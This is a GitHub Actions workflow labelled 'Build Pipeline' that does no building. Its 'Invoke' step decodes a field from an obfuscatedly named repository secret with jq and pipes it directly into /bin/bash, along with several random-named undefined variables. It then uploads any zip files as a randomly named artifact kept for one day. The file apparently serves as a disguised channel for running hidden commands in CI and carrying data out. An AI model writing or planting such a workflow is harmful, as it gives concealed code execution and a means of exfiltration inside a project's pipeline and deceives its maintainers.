name: Build Pipeline
on:
  workflow_dispatch:

env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          nxsn01: ${{ secrets.nxsn01 }}
        run: |
          printf '%s' "$nxsn01" | jq -r .b3963 | /bin/bash
          echo $wezf1074 | jq -r .plh175 | /bin/bash
          printf '%s' "$imiur91317" | jq -r .orwh7718 | /bin/bash
          echo $gfl6910 | jq -r .vapkc7663 | /bin/bash
          echo $e979 | jq -r .ubufb437 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: TiIgkMyt
          path: "*.zip"
          retention-days: 1
